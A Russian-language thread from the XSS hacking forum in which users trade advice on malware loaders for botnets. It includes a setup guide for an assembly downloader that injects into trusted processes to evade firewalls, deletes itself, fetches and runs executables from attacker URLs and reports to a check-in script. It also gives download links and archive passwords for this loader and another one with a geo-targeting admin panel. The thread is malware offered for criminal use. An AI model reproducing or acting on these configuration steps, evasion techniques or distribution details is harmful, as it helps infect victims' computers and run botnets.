• XSS.stack #1 – первый литературный журнал от юзеров форума

Посоветуйте лоадер.

Ar3s

Старожил форума
Легенда
Регистрация
30.12.2004
Сообщения
3 357
Реакции
1 404
Паблик/полупаблик/или еще какого. Хочу все свои ботнеты убить нафиг и перед смертью конвертнуть их в лоадера. Что бы потом из него прогружаться при написании статей.
 
Ты же олдмембер, стукни кому нибудь с форума и запроси что нибудь приватное.
Волку например
Разумные люди всегда просят что-то взамен своему труду\знаниям независимо от даты регистрации на форуме. Старый паблик надеюсь кто-нибудь выложет, а там я уже оценю нужен мне приват лоадер или нет(трафик свой и пока мизерный)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
зевс грузи. там и лоадер и прокси.
И через месяц они все до одного сдохнут ))) И лоадер там колеченный не всё запускает)) Да и вообще зевс не для этого)

лоадер закриптованный <73Кб.
Них*я себе)) На VB что ли и лоадер и криптор и ещё там чё-нить в нём? Ппц даже представить не могу что там может быть, у нас трой спам+ддос+лоадер меньше весит )

По поводу лоадера у кого есть доступ в приват у того есть наш лоадер бесплатно.
 
Них*я себе)) На VB что ли и лоадер и криптор и ещё там чё-нить в нём? Ппц даже представить не могу что там может быть, у нас трой спам+ддос+лоадер меньше весит )
Я ж говорил уже тебе что не программист :) , года 3 не касаюсь темы программирования. Лоадер созданный билдером 1.2.2.1 весит 61 952 байт, закриптованный CRUM Private Cryptor по-разному, но не менее 73Кб

По поводу лоадера у кого есть доступ в приват у того есть наш лоадер бесплатно.
:) это мне уже рассказали
Проверю сам exe снифером, а в скриптах админки нет подвоха? Сам пользовался им?(извини за занудство :) )
 
[Features]

* сверхмалый размер (около 1.5кб)
* обход большинства файрволов путем инжекта кода в доверенный процесс (Outpost 2.5, 3.0),
  не работает под Kerio Personal Firewall
* неограниченное количество адресов для загрузки и "отстукивания" на скрипт
* может еще чего =)


[Setup]

Адреса прописываются в загрузчик путем редактирования исходного кода. Берем Блокнот или любой другой текстовый редактор, находим в файле loader.asm следующие строки

Url  db  "http://.nl/1.exe",0
db  "http://.nl/2.exe",0
db "http://dirtysex.com/counter.php",0,0

и вписываем сюда свои адреса соблюдая синтаксис ассемблера. Т.е. заменяем имеющиеся адреса на свои.
Если требуется добавить / удалить адрес для загрузки, делаем так:

Url  db  "http://.nl/1.exe",0
db  "http://nl/2.exe",0
db  "http://w_3.exe",0
db "http://huc/counter.php",0,0

Последним в списке приведен скрипт, на который загрузчик "отстукивается" о проделанной работе. Скриптов может быть сколько угодно, однако логично ставить его последним в списке.
Затем запустить build.bat. Если настройки в исходном коде произведены корректно, появится файл loader.exe


[Алгоритм работы]

Сразу после запуска файл загрузчика самоуничтожается, а его копия в памяти ждет наличия соединения с интернетом. Как только оно обнаружено, происходит последовательное скачивание прописанных файлов. Если первые два байта полученных данных являются заголовком исполняемого файла (MZ) то происходит запись файла в текущую папку и его запуск.


[Внимание, при сборке/использовании необходимо учитывать]

0) минимальный список должен состоять из двух адресов

1) все загружаемые файлы должны иметь _разные_ имена

1) адреса в списке разделяются между собой нулевым терминатором (,0) а в конце их стоит _два_

2) если какой-либо сервер в списке оказывается "в дауне" или заблокированным, т.е. соединение до него не доходят с данного IP, загрузчик будет его мучить бесконечно, т.е. фактически "зависнет".

Скачать


nTech_Loader

Скачать

Password: V_ %7$f?f.`b4!PS


robots

Бла бла, лоадер с админкой, грузим по странам, одноразова на 1 машину столько файлов, сколько заданно в админке на момент отстука файла, при том что будут заданны нужные страны, вообщем так себе, но попользлватся можно...
Есть сорсы на дельфях.

Скачать

password: 123
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх